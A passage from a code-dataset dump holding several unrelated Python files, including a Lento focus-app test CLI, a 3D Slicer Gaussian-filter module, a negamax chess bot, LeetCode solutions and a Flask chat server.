USE THIS FOR SCRIPTING PURPOSES. END-USER\n# USE OF THIS SCRIPT IS NOT SUPPORTED. WE USE THIS\n# SCRIPT FOR LIVE-AMMO TESTING OF THE BACKEND; USING\n# IT WITH LENTO MAY HAVE UNINTENDED OR UNEXPECTED\n# CONSEQUENCES.\nimport argparse\nimport copy\nimport json\nimport os\nimport platform\nfrom lento.common import cards_management as CardsManagement\nfrom lento import utils\nfrom tests import helpers\n\nparser = argparse.ArgumentParser(\n description=\"Run backend functions to make sure they work.\"\n)\nparser.add_argument(\n \"name\",\n type=str,\n help=\"name of function to run\"\n)\nparser.add_argument(\"param1\", nargs='?')\nparser.add_argument(\"param2\", nargs='?')\nparser.add_argument(\"param3\", nargs='?')\nparser.add_argument(\"param4\", nargs='?')\nparser.add_argument(\"param5\", nargs='?')\nparser.add_argument(\"param6\", nargs='?')\nparser.add_argument(\"param7\", nargs='?')\nparser.add_argument(\"param8\", nargs='?')\nparser.add_argument(\"param9\", nargs='?')\nparser.add_argument(\"param10\", nargs='?')\n\nargs = parser.parse_args()\nf = args.name\nparam1 = args.param1\nparam2 = args.param2\nparam3 = args.param3\nparam4 = args.param4\nparam5 = args.param5\nparam6 = args.param6\nparam7 = args.param7\nparam8 = args.param8\nparam9 = args.param9\nparam10 = args.param10\n\nresult_options = {\n \"message\": f\"ran {f} successfully!\",\n \"output\": None,\n}\n\nif f == \"create_card\":\n CardsManagement.create_card()\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"read_cards\":\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"delete_card\":\n CardsManagement.delete_card(param1)\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"update_metadata\":\n CardsManagement.update_metadata(param1, param2, param3)\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"add_to_site_blocklists\":\n CardsManagement.add_to_site_blocklists(param1, param2, param3)\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"update_site_blocklists\":\n CardsManagement.update_site_blocklists(\n param1,\n param2,\n {\n \"youtube.com\": True,\n \"twitter.com\": False\n }\n )\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"add_to_app_blocklists\":\n if platform.system() == \"Windows\":\n apps_to_add = copy.deepcopy(helpers.data[\"apps_to_add\"])\n apps_to_add[1][\"path\"] = os.path.join(\n os.path.expanduser(\"~\"),\n \"AppData\",\n \"Local\",\n \"Vivaldi\",\n \"Application\",\n \"vivaldi.exe\"\n )\n apps_to_add[1][\"icon_path\"] = os.path.join(\n os.path.expanduser(\"~\"),\n \"AppData\",\n \"Local\",\n \"Lento\",\n \"vivaldi.bmp\"\n )\n CardsManagement.add_to_app_blocklists(\n param1,\n param2,\n apps_to_add\n )\n result_options[\"output\"] = CardsManagement.read_cards()\n elif platform.system() == \"Darwin\":\n CardsManagement.add_to_app_blocklists(\n param1,\n param2,\n [\n \"/Applications/GRIS.app\",\n \"/Applications/Scrivener.app\",\n \"/Applications/NetNewsWire.app\"\n ]\n )\n result_options[\"output\"] = CardsManagement.read_cards()\nelif f == \"get_apps\":\n r = utils.get_apps()\n result_options[\"output\"] = r\nelif f == \"update_app_blocklists\":\n if platform.system() == \"Windows\":\n CardsManagement.update_app_blocklists(\n param1,\n param2,\n {\n \"vivaldi\": {\n \"enabled\": True,\n \"path\": \"C:\\\\Users\\\\natha\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\", # noqa: E501\n \"app_icon_path\": \"C:\\\\Users\\\\natha\\\\AppData\\\\Local\\\\Lento\\\\vivaldi.bmp\" # noqa: E501\n },\n \"Trello\": {\n \"enabled\": False,\n \"path\": \"C:\\\\Program Files\\\\WindowsApps\\\\45273LiamForsyth.PawsforTrello_2.12.5.0_x64__7pb5ddty8z1pa\\\\app\\\\Trello.exe\", # noqa: E501\n \"app_icon_path\": \"C:\\\\Program Files\\\\WindowsApps\\\\45273LiamForsyth.PawsforTrello_2.12.5.0_x64__7pb5ddty8z1pa\\\\assets\\\\Square310x310Logo.scale-200.png\" # noqa: E501\n }\n }\n )\n elif platform.system() == \"Darwin\":\n CardsManagement.update_app_blocklists(\n param1,\n param2,\n {\n \"Scrivener\": {\n \"enabled\": True,\n \"bundle_id\": \"com.literatureandlatte.scrivener3\",\n \"app_icon_path\": \"~/Library/Application Support/Lento/Scrivener.jpg\" # noqa: E501\n },\n \"NetNewsWire\": {\n \"enabled\": True,\n \"bundle_id\": \"com.ranchero.NetNewsWire-Evergreen\",\n \"app_icon_path\": \"~/Library/Application Support/Lento/NetNewsWire.jpg\" # noqa: E501\n },\n \"GRIS\": {\n \"enabled\": True,\n \"bundle_id\": \"unity.nomada studio.GRIS\",\n \"app_icon_path\": \"~/Library/Application Support/Lento/GRIS.jpg\" # noqa: E501\n },\n }\n )\nelif f == \"add_notification\":\n CardsManagement.add_notification(\n param1,\n True,\n param2,\n \"banner\",\n [\"twitter.com\", \"youtube.com\"],\n [\"Debug USACO problem\"],\n 42,\n \"get back to work\",\n \"keep focused\",\n {\n \"reminder\": \"~/Desktop/reminder.mp3\",\n \"Frog\": \"/System/Library/Sounds/Frog.aiff\"\n }\n )\nelif f == \"update_notification_list\":\n CardsManagement.update_notification_list(\n param1,\n {\n \"2d189b37-6eaf-478f-a5ab-e19c9dab5738\": {\n \"name\": \"testnotif2\",\n \"enabled\": True,\n \"type\": \"banner\",\n \"blocked_visit_triggers\": [\n \"twitter.com\",\n \"youtube.com\"\n ],\n \"associated_goals\": [\n \"Debug USACO problem\"\n ],\n \"time_interval_trigger\": 42,\n \"title\": \"get back to work\",\n \"body\": \"keep focused\",\n \"audio_paths\": {\n \"reminder\": \"~/Desktop/reminder.mp3\",\n \"Frog\": \"/System/Library/Sounds/Frog.aiff\"\n }\n },\n \"ba606651f167406ca7cd88a8c9b05ceb\": {\n \"name\": \"testnotif1\",\n \"enabled\": True,\n \"type\": \"banner\",\n \"blocked_visit_triggers\": [\n \"twitter.com\",\n \"youtube.com\"\n ],\n \"associated_goals\": [\n \"Debug USACO problem\"\n ],\n \"time_interval_trigger\": 42,\n \"title\": \"get back to work\",\n \"body\": \"keep focused\",\n \"audio_paths\": {\n \"reminder\": \"~/Desktop/reminder.mp3\",\n \"Frog\": \"/System/Library/Sounds/Frog.aiff\"\n }\n }\n },\n )\nelif f == \"add_goal\":\n CardsManagement.add_goal(param1, param2)\nelif f == \"update_goal_list\":\n CardsManagement.update_goal_list(param1, {\n \"Conquer world\": True,\n \"Debug USACO problem\": False,\n })\nelse:\n result_options[\"message\"] = f\"INVALID COMMAND: {f}\"\n\nprint(result_options[\"message\"])\nif result_options[\"output\"] is not None:\n print(\"OUTPUT:\")\n print(json.dumps(result_options[\"output\"], indent=4))\n","repo_name":"clayboone/lento","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"417598959","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 2 10:02:55 2019\n\n@author: lavanyasingh\n\"\"\"\n\n# script to prepare data for the cohort of Berkeley interns \n\nimport csv\nfrom fuzzywuzzy import fuzz\nimport helpers\n\nINFILE = 'data/all_raw_cleaned.csv'\nOUTFILE = 'data/bolivia sources.csv'\n\ndef write_filtered(filter_fun, index):\n '''\n reads rows in from INFILE\n takes a filter function as first argument, of type string->bool\n takes index to filter on as second argument, of type int\n writes filtered records to OUTFILE\n '''\n total = 0\n with open(INFILE, 'r') as inf, open(OUTFILE, 'w') as outf:\n reader = csv.reader(inf, delimiter=',')\n w = csv.writer(outf, delimiter=',', quotechar='\"', \n quoting=csv.QUOTE_MINIMAL)\n for line in reader:\n if filter_fun(line[index]):\n total += 1\n w.writerow(line)\n print(f\"WROTE {total} LINES\")\n\ndef bolivia_filter(country):\n r = fuzz.ratio(country, \"Bolivia\")\n return r > 75\n\nif __name__ == '__main__':\n write_filtered(bolivia_filter, 0)","repo_name":"lsingh123/GSC2019worldnewsproject","sub_path":"UCB_interns.py","file_name":"UCB_interns.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"5066930488","text":"import logging\nimport os\nfrom typing import Annotated, Optional\n\nimport vtk\n\nimport slicer\nfrom slicer.ScriptedLoadableModule import *\nfrom slicer.util import VTKObservationMixin\nfrom slicer.parameterNodeWrapper import (\n parameterNodeWrapper,\n WithinRange,\n)\n\nfrom slicer import vtkMRMLScalarVolumeNode\n\nimport SimpleITK as sitk\n#\n# MauritanieGaussianFilter\n#\n\nclass MauritanieGaussianFilter(ScriptedLoadableModule):\n \"\"\"Uses ScriptedLoadableModule base class, available at:\n https://github.com/Slicer/Slicer/blob/main/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"MauritanieGaussianFilter\" # TODO: make this more human readable by adding spaces\n self.parent.categories = [\"Segmentation\"] # TODO: set categories (folders where the module shows up in the module selector)\n self.parent.dependencies = [] # TODO: add here list of module names that this module requires\n self.parent.contributors = [\"Mohamed Abdellahi Sidi Mohamed Blal (UN-FST)\"] # TODO: replace with \"Firstname Lastname (Organization)\"\n # TODO: update with short description of the module and a link to online module documentation\n self.parent.helpText = \"\"\"\nThis is an example of scripted loadable module bundled in an extension.\nSee more information in module documentation.\n\"\"\"\n # TODO: replace with organization, grant and thanks\n self.parent.acknowledgementText = \"\"\"\n\"\"\"\n\n # Additional initialization step after application startup is complete\n slicer.app.connect(\"startupCompleted()\", registerSampleData)\n\n\n#\n# Register sample data sets in Sample Data module\n#\n\ndef registerSampleData():\n \"\"\"\n Add data sets to Sample Data module.\n \"\"\"\n # It is always recommended to provide sample data for users to make it easy to try the module,\n # but if no sample data is available then this method (and associated startupCompeted signal connection) can be removed.\n\n import SampleData\n iconsPath = os.path.join(os.path.dirname(__file__), 'Resources/Icons')\n\n # To ensure that the source code repository remains small (can be downloaded and installed quickly)\n # it is recommended to store data sets that are larger than a few MB in a Github release.\n\n # MauritanieGaussianFilter1\n SampleData.SampleDataLogic.registerCustomSampleDataSource(\n # Category and sample name displayed in Sample Data module\n category='MauritanieGaussianFilter',\n sampleName='MauritanieGaussianFilter1',\n # Thumbnail should have size of approximately 260x280 pixels and stored in Resources/Icons folder.\n # It can be created by Screen Capture module, \"Capture all views\" option enabled, \"Number of images\" set to \"Single\".\n thumbnailFileName=os.path.join(iconsPath, 'MauritanieGaussianFilter1.png'),\n # Download URL and target file name\n uris=\"https://github.com/Slicer/SlicerTestingData/releases/download/SHA256/998cb522173839c78657f4bc0ea907cea09fd04e44601f17c82ea27927937b95\",\n fileNames='MauritanieGaussianFilter1.nrrd',\n # Checksum to ensure file integrity. Can be computed by this command:\n # import hashlib; print(hashlib.sha256(open(filename, \"rb\").read()).hexdigest())\n checksums='SHA256:998cb522173839c78657f4bc0ea907cea09fd04e44601f17c82ea27927937b95',\n # This node name will be used when the data set is loaded\n nodeNames='MauritanieGaussianFilter1'\n )\n\n # MauritanieGaussianFilter2\n SampleData.SampleDataLogic.registerCustomSampleDataSource(\n # Category and sample name displayed in Sample Data module\n category='MauritanieGaussianFilter',\n sampleName='MauritanieGaussianFilter2',\n thumbnailFileName=os.path.join(iconsPath, 'MauritanieGaussianFilter2.png'),\n # Download URL and target file name\n uris=\"https://github.com/Slicer/SlicerTestingData/releases/download/SHA256/1a64f3f422eb3d1c9b093d1a18da354b13bcf307907c66317e2463ee530b7a97\",\n fileNames='MauritanieGaussianFilter2.nrrd',\n checksums='SHA256:1a64f3f422eb3d1c9b093d1a18da354b13bcf307907c66317e2463ee530b7a97',\n # This node name will be used when the data set is loaded\n nodeNames='MauritanieGaussianFilter2'\n )\n\n\n#\n# MauritanieGaussianFilterParameterNode\n#\n\n@parameterNodeWrapper\nclass MauritanieGaussianFilterParameterNode:\n \"\"\"\n The parameters needed by module.\n\n inputVolume - The volume to threshold.\n thresholdedVolume - The output volume that will contain the filtred volume.\n \"\"\"\n inputVolume: vtkMRMLScalarVolumeNode\n thresholdedVolume: vtkMRMLScalarVolumeNode\n\n\n#\n# MauritanieGaussianFilterWidget\n#\n\nclass MauritanieGaussianFilterWidget(ScriptedLoadableModuleWidget, VTKObservationMixin):\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/main/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent=None) -> None:\n \"\"\"\n Called when the user opens the module the first time and the widget is initialized.\n \"\"\"\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self) # needed for parameter node observation\n self.logic = None\n self._parameterNode = None\n self._parameterNodeGuiTag = None\n\n def setup(self) -> None:\n \"\"\"\n Called when the user opens the module the first time and the widget is initialized.\n \"\"\"\n ScriptedLoadableModuleWidget.setup(self)\n\n # Load widget from .ui file (created by Qt Designer).\n # Additional widgets can be instantiated manually and added to self.layout.\n uiWidget = slicer.util.loadUI(self.resourcePath('UI/MauritanieGaussianFilter.ui'))\n self.layout.addWidget(uiWidget)\n self.ui = slicer.util.childWidgetVariables(uiWidget)\n\n # Set scene in MRML widgets. Make sure that in Qt designer the top-level qMRMLWidget's\n # \"mrmlSceneChanged(vtkMRMLScene*)\" signal in is connected to each MRML widget's.\n # \"setMRMLScene(vtkMRMLScene*)\" slot.\n uiWidget.setMRMLScene(slicer.mrmlScene)\n\n # Create logic class. Logic implements all computations that should be possible to run\n # in batch mode, without a graphical user interface.\n self.logic = MauritanieGaussianFilterLogic()\n\n # Connections\n\n # These connections ensure that we update parameter node when scene is closed\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.StartCloseEvent, self.onSceneStartClose)\n self.addObserver(slicer.mrmlScene, slicer.mrmlScene.EndCloseEvent, self.onSceneEndClose)\n\n # Buttons\n self.ui.applyButton.connect('clicked(bool)', self.onApplyButton)\n\n # Make sure parameter node is initialized (needed for module reload)\n self.initializeParameterNode()\n\n def cleanup(self) -> None:\n \"\"\"\n Called when the application closes and the module widget is destroyed.\n \"\"\"\n self.removeObservers()\n\n def enter(self) -> None:\n \"\"\"\n Called each time the user opens this module.\n \"\"\"\n # Make sure parameter node exists and observed\n self.initializeParameterNode()\n\n def exit(self) -> None:\n \"\"\"\n Called each time the user opens a different module.\n \"\"\"\n # Do not react to parameter node changes (GUI will be updated when the user enters into the module)\n if self._parameterNode:\n self._parameterNode.disconnectGui(self._parameterNodeGuiTag)\n self._parameterNodeGuiTag = None\n self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self._checkCanApply)\n\n def onSceneStartClose(self, caller, event) -> None:\n \"\"\"\n Called just before the scene is closed.\n \"\"\"\n # Parameter node will be reset, do not use it anymore\n self.setParameterNode(None)\n\n def onSceneEndClose(self, caller, event) -> None:\n \"\"\"\n Called just after the scene is closed.\n \"\"\"\n # If this module is shown while the scene is closed then recreate a new parameter node immediately\n if self.parent.isEntered:\n self.initializeParameterNode()\n\n def initializeParameterNode(self) -> None:\n \"\"\"\n Ensure parameter node exists and observed.\n \"\"\"\n # Parameter node stores all user choices in parameter values, node selections, etc.\n # so that when the scene is saved and reloaded, these settings are restored.\n\n self.setParameterNode(self.logic.getParameterNode())\n\n # Select default input nodes if nothing is selected yet to save a few clicks for the user\n if not self._parameterNode.inputVolume:\n firstVolumeNode = slicer.mrmlScene.GetFirstNodeByClass(\"vtkMRMLScalarVolumeNode\")\n if firstVolumeNode:\n self._parameterNode.inputVolume = firstVolumeNode\n\n def setParameterNode(self, inputParameterNode: Optional[MauritanieGaussianFilterParameterNode]) -> None:\n \"\"\"\n Set and observe parameter node.\n Observation is needed because when the parameter node is changed then the GUI must be updated immediately.\n \"\"\"\n\n if self._parameterNode:\n self._parameterNode.disconnectGui(self._parameterNodeGuiTag)\n self.removeObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self._checkCanApply)\n self._parameterNode = inputParameterNode\n if self._parameterNode:\n # Note: in the .ui file, a Qt dynamic property called \"SlicerParameterName\" is set on each\n # ui element that needs connection.\n self._parameterNodeGuiTag = self._parameterNode.connectGui(self.ui)\n self.addObserver(self._parameterNode, vtk.vtkCommand.ModifiedEvent, self._checkCanApply)\n self._checkCanApply()\n\n def _checkCanApply(self, caller=None, event=None) -> None:\n if self._parameterNode and self._parameterNode.inputVolume and self._parameterNode.thresholdedVolume:\n self.ui.applyButton.toolTip = \"Compute output volume\"\n self.ui.applyButton.enabled = True\n else:\n self.ui.applyButton.toolTip = \"Select input and output volume nodes\"\n self.ui.applyButton.enabled = False\n\n def onApplyButton(self) -> None:\n \"\"\"\n Run processing when user clicks \"Apply\" button.\n \"\"\"\n \n # inputVolumeNode = self.ui.inputSelector.currentNode()\n # outputVolumeNode = self.ui.outputSelector.currentNode()\n \n with slicer.util.tryWithErrorDisplay(\"Failed to compute results.\", waitCursor=True):\n \n inputVolumeNode = self.ui.inputSelector.currentNode()\n outputVolumeNode = self.ui.outputSelector.currentNode()\n if not inputVolumeNode or not outputVolumeNode:\n slicer.util.errorDisplay(\"Invalid input or output volume nodes.\")\n return\n \n print(f\"inputVolumeNode : {inputVolumeNode}\")\n\n filtered_image = self.logic.apply_filter(inputVolumeNode)\n\n # # Use slicer.util.arrayFromVolume, not arrayFromVolumeNode\n # filtered_array = slicer.util.arrayFromVolume(outputVolumeNode)\n # filtered_array[:] = filtered_image # Update the data\n \n \n \n \n # Update the new volume node with the filtered image data\n slicer.util.updateVolumeFromArray(outputVolumeNode, filtered_image)\n\n # Notify Slicer that the volume data has changed\n outputVolumeNode.GetImageData().Modified()\n\n # Update the display\n slicer.app.applicationLogic().GetSelectionNode().SetReferenceActiveVolumeID(outputVolumeNode.GetID())\n slicer.app.applicationLogic().PropagateVolumeSelection(0)\n\n\n#\n# MauritanieGaussianFilterLogic\n#\n\nclass MauritanieGaussianFilterLogic(ScriptedLoadableModuleLogic):\n \"\"\"This class should implement all the actual\n computation done by your module. The interface\n should be such that other python code can import\n this class and make use of the functionality without\n requiring an instance of the Widget.\n Uses ScriptedLoadableModuleLogic base class, available at:\n https://github.com/Slicer/Slicer/blob/main/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"\n Called when the logic class is instantiated. Can be used for initializing member variables.\n \"\"\"\n ScriptedLoadableModuleLogic.__init__(self)\n\n def getParameterNode(self):\n return MauritanieGaussianFilterParameterNode(super().getParameterNode())\n\n def apply_filter(self, inputVolume):\n \n \"\"\"\n Filtre Gaussien :\n Explication: Ce filtre élimine le bruit en floutant l'image, réduisant ainsi les détails de haute fréquence.\n Utilisation: Utilisé pour la réduction de bruit et le lissage de l'image.\n\n Paramètres:\n image: Image d'entrée.\n sigma: Écart-type du filtre gaussien.\n \"\"\"\n\n # Get volume data\n input_data = slicer.util.array(inputVolume.GetID())\n print(f\"input_data : {input_data}\")\n\n # Convert to SimpleITK image\n sitk_image = sitk.GetImageFromArray(input_data)\n\n # Apply Gaussian smoothing filter\n filtered_image = sitk.SmoothingRecursiveGaussian(sitk_image, sigma=2.0)\n\n # Convert back to numpy array\n filtered_data = sitk.GetArrayFromImage(filtered_image)\n\n return filtered_data\n\n\n\n#\n# MauritanieGaussianFilterTest\n#\n\nclass MauritanieGaussianFilterTest(ScriptedLoadableModuleTest):\n \"\"\"\n This is the test case for your scripted module.\n Uses ScriptedLoadableModuleTest base class, available at:\n https://github.com/Slicer/Slicer/blob/main/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setUp(self):\n \"\"\" Do whatever is needed to reset the state - typically a scene clear will be enough.\n \"\"\"\n slicer.mrmlScene.Clear()\n\n def runTest(self):\n \"\"\"Run as few or as many tests as needed here.\n \"\"\"\n self.setUp()\n self.test_MauritanieGaussianFilter1()\n\n def test_MauritanieGaussianFilter1(self):\n \"\"\" Ideally you should have several levels of tests. At the lowest level\n tests should exercise the functionality of the logic with different inputs\n (both valid and invalid). At higher levels your tests should emulate the\n way the user would interact with your code and confirm that it still works\n the way you intended.\n One of the most important features of the tests is that it should alert other\n developers when their changes will have an impact on the behavior of your\n module. For example, if a developer removes a feature that you depend on,\n your test should break so they know that the feature is needed.\n \"\"\"\n\n self.delayDisplay(\"Starting the test\")\n\n # Get/create input data\n\n import SampleData\n registerSampleData()\n inputVolume = SampleData.downloadSample('MauritanieGaussianFilter1')\n self.delayDisplay('Loaded test data set')\n\n # inputScalarRange = inputVolume.GetImageData().GetScalarRange()\n # self.assertEqual(inputScalarRange[0], 0)\n # self.assertEqual(inputScalarRange[1], 695)\n\n outputVolume = slicer.mrmlScene.AddNewNodeByClass(\"vtkMRMLScalarVolumeNode\")\n # threshold = 100\n\n # Test the module logic\n\n logic = MauritanieGaussianFilterLogic()\n \n filtered_image = logic.apply_filter(inputVolume)\n \n # Update the new volume node with the filtered image data\n slicer.util.updateVolumeFromArray(outputVolume, filtered_image)\n\n # Notify Slicer that the volume data has changed\n outputVolume.GetImageData().Modified()\n\n self.delayDisplay('Test passed')\n","repo_name":"mhdabdellah/SlicerMauritanieUN_FST","sub_path":"MauritanieGaussianFilter/MauritanieGaussianFilter.py","file_name":"MauritanieGaussianFilter.py","file_ext":"py","file_size_in_byte":16192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22199526869","text":"# coding:utf-8\n\nimport os\nfrom time import strftime, localtime\nimport re\nfrom hashlib import md5\nimport requests\n\nROOT_DIR = os.path.abspath(os.path.dirname(__file__))\n\ndef get_html_filename(url, dst_name=None):\n log_txt = ROOT_DIR+\"/log.txt\"\n if os.path.exists(log_txt):\n with open(log_txt, \"r\") as f:\n a = re.findall(\"%s\\n(.*?)\\n\\n\" % url, f.read())\n if a:\n # print(\"find it in cache\")\n return ROOT_DIR+\"/html/\"+a[0]\n\n # print(\"not in cache\")\n if not dst_name:\n dst_name = md5(url.encode(\"utf-8\")).hexdigest() + \"_\" + \\\n strftime(\"%Y%m%d%H%M\", localtime()) + \".html\" \n\n page = requests.get(url)\n if page.status_code != 200:\n print(\"could not get page source html: %s\" % str(page.status_code))\n exit(1)\n\n print(\"download HTML page source : %s\" % url)\n with open(ROOT_DIR+\"/html/%s\" % dst_name, \"w\") as f:\n f.write(page.content.decode(\"utf-8\"))\n with open(ROOT_DIR+\"/log.txt\", \"a\") as f:\n f.write(\"%s\\n%s\\n\\n\" % (url, dst_name))\n\n # print(\"now, it is in cache\")\n return ROOT_DIR+\"/html/\"+dst_name\n\ndef get_etree_handler(url):\n filename = get_html_filename(url)\n with open(filename, \"r\") as f:\n c = f.read()\n\n from lxml import etree\n return etree.HTML(c)\n\nif __name__ == '__main__':\n get_html_filename(\"https://www.baidu.com\")","repo_name":"longuan/python-script","sub_path":"saveHTML/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"8055681804","text":"from math import inf\nfrom piece import Piece\nfrom utils import calculate_total_score\nfrom typing import Tuple, DefaultDict, Optional\n\n\nclass Bot:\n def __init__(self, board, depth=3):\n self.board = board\n self.depth = depth\n\n def play(self, color=\"black\", grid=None):\n return self.get_negamax_move(self.depth, color, grid)\n\n def calculate_movement_score(self, p1, p2, grid=None):\n # If no grid is provided, use the board grid as default\n if not grid:\n grid = self.board.grid\n\n # Clone the grid, to simulate the movement and calculate the new board score.\n tmp = self.board.clone_grid(grid)\n # Move the piece from p1 to p2\n tmp[p2], tmp[p1] = tmp[p1], None\n\n return tmp, calculate_total_score(tmp)\n\n def quiescence_search(self, grid, alpha, beta):\n \"\"\"\n Quiescence search is required to avoid move that are dangerous.\n As explained here: https://www.chessprogramming.org/Quiescence_Search\n \"\"\"\n last_score = calculate_total_score(grid)\n\n if last_score >= beta:\n return beta\n alpha = max(alpha, last_score)\n\n new_moves = self.board.filter_illegal_moves(\n self.board.get_color_all_moves(\"black\", grid), \"black\"\n )\n\n for move in new_moves:\n if self.board.is_capture_move(move, grid):\n tmp = self.board.clone_grid(grid)\n (s, e) = move\n # Move the piece from s to e\n tmp[e] = tmp[s].clone()\n tmp.pop(s)\n\n score = -self.quiescence_search(grid, -beta, -alpha)\n\n if score >= beta:\n return beta\n if score > alpha:\n alpha = score\n\n return alpha\n\n def negamax(\n self,\n depth,\n grid: DefaultDict[Tuple[int, int], Optional[Piece]],\n is_maximizing,\n alpha,\n beta,\n ):\n if depth == 0:\n return -self.quiescence_search(grid, alpha, beta)\n\n # Get all the moves possible on the new grid.\n new_moves = self.board.filter_illegal_moves(\n self.board.get_color_all_moves(\"black\", grid), \"black\"\n )\n\n best_score = -inf\n for (s, e) in new_moves:\n # Clone the grid so movement can be done without impacting the game.\n tmp = self.board.clone_grid(grid)\n\n # Move the piece from s to e\n tmp[e] = tmp[s].clone()\n tmp.pop(s)\n\n # Ignore illegal moves\n if self.board.is_color_in_check(\"black\", tmp):\n continue\n\n score = -self.negamax(depth - 1, tmp, not is_maximizing, -beta, -alpha)\n\n if score >= beta:\n return score\n if score > best_score:\n best_score = score\n if score > alpha:\n alpha = score\n\n return best_score\n\n def get_negamax_move(self, depth=3, color=\"black\", grid=None):\n if not grid:\n grid = self.board.grid\n\n best_next_score = -inf\n best_next_node = None\n\n alpha = -inf\n beta = inf\n\n # Goes through all the children, and choose the next move that should be done.\n for (s, e) in self.board.filter_illegal_moves(\n self.board.get_color_all_moves(\"black\", grid), \"black\"\n ):\n tmp = self.board.clone_grid(grid)\n # Move the piece from s to e\n tmp[e] = tmp[s].clone()\n tmp.pop(s)\n\n # Ignore illegal moves\n if self.board.is_color_in_check(\"black\", tmp):\n continue\n\n node_minimax = self.negamax(depth - 1, tmp, color == \"white\", -beta, -alpha)\n\n if best_next_score < node_minimax:\n best_next_score = node_minimax\n best_next_node = (s, e)\n\n if node_minimax > alpha:\n alpha = node_minimax\n\n return best_next_node\n","repo_name":"TriForMine/py-chess-tk","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"40014213438","text":"#\n# @lc app=leetcode.cn id=1376 lang=python3\n#\n# [1376] 通知所有员工所需的时间\n#\n\n# @lc code=start\nclass Solution:\n def numOfMinutes(self, n: int, headID: int, manager: List[int], informTime: List[int]) -> int:\n dct = defaultdict(list)\n for i in range(n):\n dct[manager[i]].append(i)\n\n def dfs(pre, root):\n nonlocal ans\n if not dct[root]:\n if pre > ans:\n ans = pre\n return\n for nex in dct[root]:\n dfs(pre+informTime[root], nex)\n return\n\n ans = 0\n dfs(0, headID)\n return ans\n\n# @lc code=end\n\n","repo_name":"vitotse/Leetcode-vscode","sub_path":"leetcode/1376.通知所有员工所需的时间.py","file_name":"1376.通知所有员工所需的时间.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4879308281","text":"from collections import defaultdict\nimport heapq\n\nclass Solution:\n def impl(self, s):\n char_count = defaultdict(int)\n # count of each characters\n for c in s:\n char_count[c] += 1\n freq_count = defaultdict(int)\n # count of each frequency\n for freq in char_count.values():\n freq_count[freq] += 1\n max_heap = [(-freq, count) for freq, count in freq_count.items()]\n max_heap.append((0, 0))\n heapq.heapify(max_heap)\n deletes = 0\n # drop one character at a time\n while len(max_heap) > 1:\n f1, c1 = heapq.heappop(max_heap)\n f2, c2 = heapq.heappop(max_heap)\n delta = c1 - 1\n f1 += 1\n deletes += delta\n if f1 == f2 and c2 + delta > 1:\n heapq.heappush(max_heap, (f2, c2 + delta))\n else:\n if delta > 1:\n heapq.heappush(max_heap, (f1, delta))\n heapq.heappush(max_heap, (f2, c2))\n return deletes\n\nif __name__ == '__main__':\n s = Solution()\n ans = s.impl(\"example\")\n print(ans)\n\n","repo_name":"ZhouningMan/LeetCodePython","sub_path":"mscodility/MinDeletionsToMakeFrequencyOfEachLetterUnique.py","file_name":"MinDeletionsToMakeFrequencyOfEachLetterUnique.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31343450361","text":"from flask import Flask, render_template, url_for\nfrom flask_socketio import SocketIO, send\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = \"123\"\n\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\n\n\n@socketio.on(\"message\")\ndef handler_message(message):\n send(message, broadcast=True)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n socketio.run(app)","repo_name":"YaroslavOvchinnikov/test_task_Datagrok","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20705678579","text":"from django.db.models import Count, Q\r\nfrom django.shortcuts import render\r\nfrom django.views import View\r\nfrom django.views.generic import ListView, DetailView\r\nfrom django.http import HttpRequest, HttpResponse\r\nfrom site_module.models import SiteBanner\r\nfrom utils import http_service, convertors\r\n\r\nfrom . import models\r\n\r\n\r\nclass ProductListView(ListView):\r\n template_name = 'product_module/product_list.html'\r\n model = models.Products\r\n paginate_by = 9\r\n context_object_name = 'products'\r\n ordering = ['-id']\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(ProductListView, self).get_context_data(**kwargs)\r\n query = models.Products.objects.all()\r\n product: 